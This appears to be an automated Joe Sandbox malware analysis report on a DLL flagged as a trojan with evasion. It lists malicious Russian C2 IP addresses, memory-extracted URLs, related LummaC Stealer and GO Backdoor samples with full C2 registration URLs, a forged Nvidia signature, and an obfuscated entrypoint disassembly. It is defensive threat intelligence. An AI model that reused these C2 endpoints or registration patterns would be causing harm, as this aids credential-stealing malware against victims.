http://77.238.229.6377.238.250.123:80Go-http-client/1.1If-Modified-SinceX-Content-Type-OptionsTransf	0%	Avira URL Cloud	safe
http://91.142.74.28http://77.238.224.56http://77.238.229.6377.238.250.123:80PM	0%	Avira URL Cloud	safe
http://91.142.74.28User-Agent:	0%	Avira URL Cloud	safe
http://77.238.250.123http://195.2.70.38	0%	Avira URL Cloud	safe
http://77.238.229.6377.238.250.123:80q	0%	Avira URL Cloud	safe
http://195.2.70.38Go-http-client/1.1http://77.238.224.56PM	0%	Avira URL Cloud	safe
http://195.2.70.38http://91.142.74.28PM	0%	Avira URL Cloud	safe
http://91.142.74.28PM	0%	Avira URL Cloud	safe
http://195.2.70.38http://91.142.74.28http://77.238.224.56PM	0%	Avira URL Cloud	safe
http://91.142.74.28/	0%	Avira URL Cloud	safe
http://195.2.70.38P	0%	Avira URL Cloud	safe
http://91.142.74.28/	2%	Virustotal		Browse
http://crl.entrust.net/ts1ca.crl0	0%	Avira URL Cloud	safe
http://www.entrust.net/rpa0	0%	Avira URL Cloud	safe
http://crl.entrust.net/ts1ca.crl0	0%	Virustotal		Browse
http://77.238.229.6377.238.250.123:80Go-http-client/1.1P	0%	Avira URL Cloud	safe
http://195.2.70.38Z	0%	Avira URL Cloud	safe
http://195.2.70.38Go-http-client/1.1http://91.142.74.28PM	0%	Avira URL Cloud	safe
http://91.142.74.28	0%	Avira URL Cloud	safe
http://www.entrust.net/rpa0	0%	Virustotal		Browse
http://195.2.70.38	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://77.238.229.63/	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://195.2.70.38/	true	5%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://77.238.250.123/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://77.238.224.56/	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://91.142.74.28/	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://77.238.224.56PM	rundll32.exe, 00000004.00000002.3678995748.000000000D412000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3678278752.000000000D8B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3682727850.000000000DA82000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3680860732.000000000D606000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3678440712.000000000D410000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3680860732.000000000D59A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.2.70.38Go-http-client/1.1	rundll32.exe, 00000005.00000002.3678278752.000000000D810000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.2.70.38PM	rundll32.exe, 00000004.00000002.3678995748.000000000D412000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3678278752.000000000D8B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3678440712.000000000D410000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.229.6377.238.250.123:80Go-http-client/1.1X-Content-Type-OptionsTransfer-EncodingT	rundll32.exe, 0000000F.00000002.3680860732.000000000D606000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	file.dll	false	URL Reputation: safe	unknown
http://ocsp.entrust.net02	file.dll	false	URL Reputation: safe	unknown
http://www.entrust.net/rpa03	file.dll	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://77.238.224.56Go-http-client/1.1	rundll32.exe, 00000005.00000002.3678278752.000000000D8BE000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.224.56Go-http-client/1.1P	rundll32.exe, 00000005.00000002.3678278752.000000000D8BE000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.229.6377.238.250.123:80PM	rundll32.exe, 00000005.00000002.3678278752.000000000D8B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3678278752.000000000D8BE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3678278752.000000000D810000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3678440712.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://aia.entrust.net/ts1-chain256.cer01	file.dll	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://77.238.224.56	rundll32.exe, 0000000F.00000002.3678440712.000000000D471000.00000004.00001000.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://77.238.224.56Go-http-client/1.1X-Content-Type-OptionsTransfer-EncodingP	rundll32.exe, 00000005.00000002.3682727850.000000000DA82000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.2.70.38Go-http-client/1.1Go-http-client/1.1http://77.238.224.56Go-http-client/1.1Go-http-	rundll32.exe, 0000000F.00000002.3680860732.000000000D59A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.229.6377.238.250.123:8091.142.73.198:30865	rundll32.exe, 00000004.00000002.3678995748.000000000D4B0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.229.63	rundll32.exe, 0000000F.00000002.3678440712.000000000D471000.00000004.00001000.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://77.238.229.6377.238.250.123:80Go-http-client/1.1X-Content-Type-OptionsTransfer-EncodingGo-htt	rundll32.exe, 0000000F.00000002.3678440712.000000000D410000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.250.123	rundll32.exe, 0000000F.00000002.3678440712.000000000D474000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3680860732.000000000D672000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3678440712.000000000D471000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://77.238.229.6377.238.250.123:80Go-http-client/1.1Go-http-client/1.1X-Content-Type-OptionsTrans	rundll32.exe, 00000005.00000002.3678278752.000000000D8B0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.224.56http://77.238.229.6377.238.250.123:80http://91.142.74.28PM	rundll32.exe, 0000000F.00000002.3678440712.000000000D410000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.142.74.28Go-http-client/1.1http://77.238.229.6377.238.250.123:80s	rundll32.exe, 0000000F.00000002.3678440712.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.229.6377.238.250.123:80Go-http-client/1.1If-Modified-SinceX-Content-Type-OptionsTransf	rundll32.exe, 00000005.00000002.3678278752.000000000D8BE000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.250.123http://195.2.70.38	rundll32.exe, 0000000F.00000002.3678440712.000000000D4F2000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3678440712.000000000D474000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3678440712.000000000D471000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.142.74.28User-Agent:	rundll32.exe, 00000005.00000002.3682727850.000000000DA82000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3678440712.000000000D410000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.142.74.28http://77.238.224.56http://77.238.229.6377.238.250.123:80PM	rundll32.exe, 0000000F.00000002.3678440712.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.229.6377.238.250.123:80q	rundll32.exe, 00000005.00000002.3678278752.000000000D810000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.2.70.38Go-http-client/1.1http://77.238.224.56PM	rundll32.exe, 0000000F.00000002.3680860732.000000000D59A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.142.74.28PM	rundll32.exe, 00000004.00000002.3678995748.000000000D4B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3678278752.000000000D8B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3682727850.000000000DA82000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3678278752.000000000D8BE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3678278752.000000000D810000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.2.70.38http://91.142.74.28PM	rundll32.exe, 0000000F.00000002.3678440712.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.2.70.38http://91.142.74.28http://77.238.224.56PM	rundll32.exe, 00000005.00000002.3678278752.000000000D810000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.2.70.38P	rundll32.exe, 00000005.00000002.3682727850.000000000DA82000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3678278752.000000000D810000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3680860732.000000000D606000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/ts1ca.crl0	file.dll	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.entrust.net/rpa0	file.dll	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://77.238.229.6377.238.250.123:80Go-http-client/1.1P	rundll32.exe, 00000005.00000002.3678278752.000000000D8B0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	file.dll	false	URL Reputation: safe	unknown
http://195.2.70.38Z	rundll32.exe, 00000005.00000002.3678278752.000000000D8BE000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.2.70.38Go-http-client/1.1http://91.142.74.28PM	rundll32.exe, 00000005.00000002.3678278752.000000000D8B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3678440712.000000000D410000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.142.74.28	rundll32.exe, 0000000F.00000002.3678440712.000000000D471000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.2.70.38	rundll32.exe, 0000000F.00000002.3678440712.000000000D474000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3680860732.000000000D672000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.3678440712.000000000D471000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.142.74.28	unknown	Russian Federation	48720	VTSL1-ASRU	true
91.142.73.198	unknown	Russian Federation	48720	VTSL1-ASRU	true
77.238.229.63	unknown	Russian Federation	42429	TELERU-ASRU	true
195.2.70.38	unknown	Russian Federation	48282	VDSINA-ASRU	true
77.238.250.123	unknown	Russian Federation	42429	TELERU-ASRU	true
77.238.224.56	unknown	Russian Federation	42429	TELERU-ASRU	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1474076
Start date and time:	2024-07-16 09:52:33 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.dll
Detection:	MAL
Classification:	mal92.troj.evad.winDLL@14/1@0/6
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .dll Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target loaddll32.exe, PID 3468 because there are no executed function
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
03:53:31	API Interceptor	1x Sleep call for process: loaddll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.142.74.28	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28/
	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28/
	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28/
	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28/
	PZjMIa3MvC.exe	Get hash	malicious	GO Backdoor	Browse	91.142.74.28:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=9b5ce04ec39c07546e6e12b6b60a6af0&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	heic.exe	Get hash	malicious	GO Backdoor	Browse	91.142.74.28:30001/api/helper-first-register?buildVersion=0SfI.qXU2qCl&md5=a64beab5d4516beca4c40b25dc0c1cd8&proxyPassword=NSU8Wq2U&proxyUsername=9nDNinxL&userId=mI62iJuWkLVJyhV2
	poration.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	91.142.74.28:30001/api/helper-first-register?buildVersion=03zq.qg826lp&md5=8f590a1aa472160887481c6e2f5f38d8&proxyPassword=QcA2y2Ws&proxyUsername=Sdow5dAF&userId=nWqFhTmNaQbSt2Ihda7aed7vpyuhphsatZmVrHbTykEH19TJ2xgu3Zjq48nS
	o8JAdiyezt.exe	Get hash	malicious	LummaC	Browse	91.142.74.28:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=7ca367a34e36125fa9a9db11d6ca360d&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	4m8RBorBUl.exe	Get hash	malicious	LummaC	Browse	91.142.74.28:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=3e5aa81f88377e3ca36da63dc29a2a89&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	q49LB2eQuo.exe	Get hash	malicious	Unknown	Browse	91.142.74.28:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=3e5aa81f88377e3ca36da63dc29a2a89&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
91.142.73.198	PZjMIa3MvC.exe	Get hash	malicious	GO Backdoor	Browse
77.238.229.63	file.dll	Get hash	malicious	Unknown	Browse	77.238.229.63/
	file.dll	Get hash	malicious	Unknown	Browse	77.238.229.63/
	file.dll	Get hash	malicious	Unknown	Browse	77.238.229.63/
	file.dll	Get hash	malicious	Unknown	Browse	77.238.229.63/
	PZjMIa3MvC.exe	Get hash	malicious	GO Backdoor	Browse	77.238.229.63:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=9b5ce04ec39c07546e6e12b6b60a6af0&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	o8JAdiyezt.exe	Get hash	malicious	LummaC	Browse	77.238.229.63:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=7ca367a34e36125fa9a9db11d6ca360d&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	4m8RBorBUl.exe	Get hash	malicious	LummaC	Browse	77.238.229.63:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=3e5aa81f88377e3ca36da63dc29a2a89&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	q49LB2eQuo.exe	Get hash	malicious	Unknown	Browse	77.238.229.63:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=3e5aa81f88377e3ca36da63dc29a2a89&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	rU53IkLA9a.exe	Get hash	malicious	LummaC	Browse	77.238.229.63:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=168b30717cd1d87c367fb2db2a800bd4&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
195.2.70.38	file.dll	Get hash	malicious	Unknown	Browse	195.2.70.38/
	file.dll	Get hash	malicious	Unknown	Browse	195.2.70.38/
	file.dll	Get hash	malicious	Unknown	Browse	195.2.70.38/
	file.dll	Get hash	malicious	Unknown	Browse	195.2.70.38/
	Image is copyrighted.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	195.2.70.38:30001/api/helper-first-register?buildVersion=0ZQk.wWJ2fdm&md5=f98035f22fcf11f0517bd800a8f92ca7&proxyPassword=R9iFXF6P&proxyUsername=Ul0u22aL&userId=i6cYnot2vd9Mo2PxiZ5jirphnl7Ccgwt20zY0iDM2ASS4lu9
	PZjMIa3MvC.exe	Get hash	malicious	GO Backdoor	Browse	195.2.70.38:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=9b5ce04ec39c07546e6e12b6b60a6af0&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	heic.exe	Get hash	malicious	GO Backdoor	Browse	195.2.70.38:30001/api/helper-first-register?buildVersion=0SfI.qXU2qCl&md5=a64beab5d4516beca4c40b25dc0c1cd8&proxyPassword=NSU8Wq2U&proxyUsername=9nDNinxL&userId=mI62iJuWkLVJyhV2
	poration.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	195.2.70.38:30001/api/helper-first-register?buildVersion=03zq.qg826lp&md5=8f590a1aa472160887481c6e2f5f38d8&proxyPassword=QcA2y2Ws&proxyUsername=Sdow5dAF&userId=nWqFhTmNaQbSt2Ihda7aed7vpyuhphsatZmVrHbTykEH19TJ2xgu3Zjq48nS
	ChOQ8w8NqZ.exe	Get hash	malicious	Unknown	Browse	195.2.70.38:30001/api/helper-first-register?buildVersion=0D14.gjm2oNi&md5=b06e67f9767e5023892d9698703ad098&proxyPassword=lzuMLKyh&proxyUsername=5Vx2nN8C&userId=mXE0iIPukTkyydhF
	o8JAdiyezt.exe	Get hash	malicious	LummaC	Browse	195.2.70.38:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=7ca367a34e36125fa9a9db11d6ca360d&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
VTSL1-ASRU	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28
	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28
	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28
	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28
	PZjMIa3MvC.exe	Get hash	malicious	GO Backdoor	Browse	91.142.73.198
	heic.exe	Get hash	malicious	GO Backdoor	Browse	91.142.74.28
	poration.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	91.142.74.28
	o8JAdiyezt.exe	Get hash	malicious	LummaC	Browse	91.142.74.28
	4m8RBorBUl.exe	Get hash	malicious	LummaC	Browse	91.142.74.28
	q49LB2eQuo.exe	Get hash	malicious	Unknown	Browse	91.142.74.28
TELERU-ASRU	file.dll	Get hash	malicious	Unknown	Browse	77.238.224.56
	file.dll	Get hash	malicious	Unknown	Browse	77.238.224.56
	file.dll	Get hash	malicious	Unknown	Browse	77.238.224.56
	file.dll	Get hash	malicious	Unknown	Browse	77.238.224.56
	PZjMIa3MvC.exe	Get hash	malicious	GO Backdoor	Browse	77.238.224.56
	poration.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	77.238.224.56
	o8JAdiyezt.exe	Get hash	malicious	LummaC	Browse	77.238.224.56
	4m8RBorBUl.exe	Get hash	malicious	LummaC	Browse	77.238.224.56
	q49LB2eQuo.exe	Get hash	malicious	Unknown	Browse	77.238.224.56
	rU53IkLA9a.exe	Get hash	malicious	LummaC	Browse	77.238.224.56
VTSL1-ASRU	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28
	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28
	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28
	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28
	PZjMIa3MvC.exe	Get hash	malicious	GO Backdoor	Browse	91.142.73.198
	heic.exe	Get hash	malicious	GO Backdoor	Browse	91.142.74.28
	poration.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	91.142.74.28
	o8JAdiyezt.exe	Get hash	malicious	LummaC	Browse	91.142.74.28
	4m8RBorBUl.exe	Get hash	malicious	LummaC	Browse	91.142.74.28
	q49LB2eQuo.exe	Get hash	malicious	Unknown	Browse	91.142.74.28
VDSINA-ASRU	file.dll	Get hash	malicious	Unknown	Browse	195.2.70.38
	file.dll	Get hash	malicious	Unknown	Browse	195.2.70.38
	file.dll	Get hash	malicious	Unknown	Browse	62.113.116.83
	file.dll	Get hash	malicious	Unknown	Browse	94.103.90.9
	mlk3kK6uLZ.exe	Get hash	malicious	Amadey, Mars Stealer, PureLog Stealer, Quasar, RedLine, Stealc, Vidar	Browse	195.2.76.207
	https://bevelia.net/app/	Get hash	malicious	Unknown	Browse	178.208.83.57
	https://bevelia.net/app/	Get hash	malicious	Unknown	Browse	178.208.83.57
	5uKDxM17pT.exe	Get hash	malicious	AveMaria, UACMe	Browse	109.234.38.71
	file.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse	195.2.71.70
	setup.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	195.2.71.70

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	data
Category:	dropped
Size (bytes):	408
Entropy (8bit):	6.205209756579014
Encrypted:	false
SSDEEP:	12:cUJVrpjWWaUTRx9cXY8GjHQZwUqHRyw2nOY75Rn:vJtpEUFx9eLGc0R8R
MD5:	F661CFE263E4E8743C19892F76C5CEA0
SHA1:	84A85309BD85EC22EADF44075C8ACB28F029E383
SHA-256:	DBDF3C022489DCB095080B1B4DBC307BAC878DAAC8BF49D849DD275DB18A7EBB
SHA-512:	742FB77351029948017D69605991C798AAE8798FBB28CC78842118632D1A92BE9765A3FDC8A70502205647E11B4B0F4DD88E1BD902BB9D6FC6695BAE19E0A336
Malicious:	false
Reputation:	low
Preview:	.6._.54=.'1S..+7SP6#A'X7L..PX3).W.3=VW&.G...\...MZ..^$.5^.>WM^.-Z.QV.7O;\+..7...]....T._..T.PPL!]+F."&W.;$R.'PGST!_?P_WZ.$[+."@)/+T\W7]Q.X@ .-Q%).Q!.\B....(...Z6......(_S.4.A.-,L69V^.!.Y0.)M?_+[47.]W-R[&.%G-.\)..QW.R]>-,@^+.V.4._"6VB/....$$.-$......8]2SU._A+.VL...^QP<Y../M=&.[#P6]V=7['..G.&.\"+.Q&Z.P.P.@/")U&'RZ?(.B2$....)...W.!>..=?1S4..AQP.L,43^?.XY.-=M$".[,.7]6.Q[\^^GV..\...V;;.Y5,[@U..R.)W[6.7]*.)

Static File Info

General

File type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.919105308820015
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.dll
File size:	11'567'224 bytes
MD5:	bcc606faae89c79eddac6b9512065022
SHA1:	98ddeb6f59827f866b9484f8c5e4a3b980b9419a
SHA256:	2ee236f7b21d860a5fea13a4347425a9cecc67ce16ee17eb34e3eb6a5cb8f4cd
SHA512:	5fcda525a9d67795d7436b60463dd73b12795bb9cd0017f95f78e2fe31a7d18de35127060eabc52659ce94c3ee65e179baea7be2928e84964346f1ddee8b798f
SSDEEP:	196608:IpVebJgj7LWWtYH4cvvYKg4vZvKQ+gwYx4YSTOdwWDMFBtd3SiwiXG7pO6pz:IpVUdW64cvvYGvZvKdxYx4YuOdpDMFBO
TLSH:	B4C633863BC781D2D68618B0A72B13D707F291694DCA89352BCD3946F471FB321BE867
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...(..N..v...b............N...,l.........................P............@... .....................d...a..

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x6d0f1799
Entrypoint Section:	.rdata2
Digitally signed:	true
Imagebase:	0x6c2c0000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:	0x6d09eb30, 0x6c7abd60, 0x6c7abd10
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	6c871eb5afcc648e749d578ab8277277

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	14/03/2022 01:00:00 15/09/2022 01:25:59
Subject Chain	CN=Nvidia Corporation, OU=IT-MIS, O=Nvidia Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	B081FCF98C7EC6B0C2576BBD98CDD907
Thumbprint SHA-1:	8F5DD157719DC8DBB937959967B0243E6F7AFE19
Thumbprint SHA-256:	404922D80D481198DA6DA973B37054478E2697072F4A9C6A812263FC5FC5959C
Serial:	055100FDBCB3E2F470A627F03FCFE5B8

Entrypoint Preview

Instruction
push ecx
call 00007F0528783DA0h
inc ecx
mov esi, 4B30033Dh
inc bx
movzx ecx, byte ptr [ecx+esi-4B30033Dh]
inc ecx
movzx eax, dh
inc ecx
mov bl, byte ptr [ecx+eax*8-000001E6h]
and cl, bl
not cl
dec ecx
bswap esi
inc ecx
movsx edx, si
inc dx
mov dword ptr [eax+ecx-3Bh], ecx
dec eax
cdq
dec edx
dec ebp
mov ebx, dword ptr [ecx+eax*4-000000F2h]
dec ecx
mov ebx, dword ptr [ecx+eax-33h]
mov ecx, eax
inc ecx
mov edi, esi
dec esp
add ebx, ebx
sub eax, EEA1FD94h
dec cl
not cl
dec esi
mov dword ptr [eax+ecx-115E029Fh], ebx
inc ecx
mov ebx, 9A04528Bh
inc ecx
sub dl, dh
inc ecx
movzx edx, word ptr [edi+eax*4-45780AA6h]
cwde
mov ebp, edi
dec ebp
lea ebp, dword ptr [ebx+ebp*8-09DF885Bh]
xor dx, si
neg dx
sar eax, 68h
inc ecx
mov ebx, ebp
adc dx, 59B0h
inc eax
and ch, bl
dec ebp
bt ebx, ebp
call 00007F05288513CCh
xor ax, 000029B9h
rol cx, FFC3h
mov dword ptr [esp+00h], ecx
adc ax, 0000F4B4h
rol byte ptr [esp+02h], FFFFFFA1h
xor bx, ax
dec cl
mov word ptr [edi], ax
dec dl
pop edx
not dl
mov ecx, dword ptr [ebp-06h]
mov eax, edx
jne 00007F05291104D7h
inc eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x104a464	0x61	.rdata2
